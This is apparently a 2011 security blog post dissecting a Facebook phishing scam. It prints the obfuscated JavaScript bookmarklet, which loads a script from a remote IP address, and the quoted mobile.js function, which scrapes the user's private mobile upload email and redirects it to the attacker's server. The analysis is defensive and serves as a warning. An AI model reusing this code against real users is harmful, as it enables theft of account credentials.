Posts tagged Javascript
Time spent on Facebook? Don’t find.

One of my FB contacts had shared this link on their facebook Wall - http://174.120.6.98/~tchecks/next.php?id=12132. It claims to run some javascript code after logging to m.facebook.com to find out how much time you’ve spent on Facebook.

javascript: var _0xbdfc=[“\x73\x63\x72\x69\x70\x74”,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74”,”\x73\x72\x63”,”\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x34\x2e\x31\x32\x30\x2e\x36\x2e\x39\x38\x2f\x7e\x74\x63\x68\x65\x63\x6b\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73”,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64”,”\x62\x6F\x64\x79”];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script); void(0);

As usual, I never support anyone running any kind of JS on address bar. So, thought to dig through the JS code. Well, that array in human’s language is ..

[“script”, “createElement”, “src”, “http://174.120.6.98/~tchecks/mobile.js”, “appendChild”, “body”]

Now, one important function in that mobile.js page is

$.get(“http://m.facebook.com/upload.php”, function(data){
var mydata = data; var mobiles; var count = 0;
$($(mydata).find(‘a’).filter(‘:contains(“m.facebook.com”)’)).each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +”;”;}});
var clean = mobiles.replace(“undefined”,”“);
var cut = clean.slice(0,clean.length - 1);
var insert = cut.replace(/;/g,”,”);
//Redirect to php inserter which redirects back to next set of steps.
top.location.href = ‘http://174.120.6.98/~tchecks/check.php?get=1&m=,’+insert;
});

This function gets the page m.facebook.com/upload.php, parses it, looks for all links with m.facebook.com in it, and grabs one email address, which as per Facebook is

  • This is *your* personal address - don’t share it with anyone
  • The email subject will be the photo caption if your email contains photos.
  • The email subject will be your updated status if your email contains no photo.
  • Save your upload email as a contact for easy access.

So, now the phisher has your private FB Mobile email address, through which he can upload pics or update your status.

Moral of the post: Don’t be dumb and run any javascript in your browser window if you don’t understand what it does. And, install NoScript for Firefox. Other browser users, find similar alternative or Get Firefox.

Posted on Saturday, 12 February 2011
Filed ↓ PhishingJavascriptFacebook
Comments
Page 1 of 1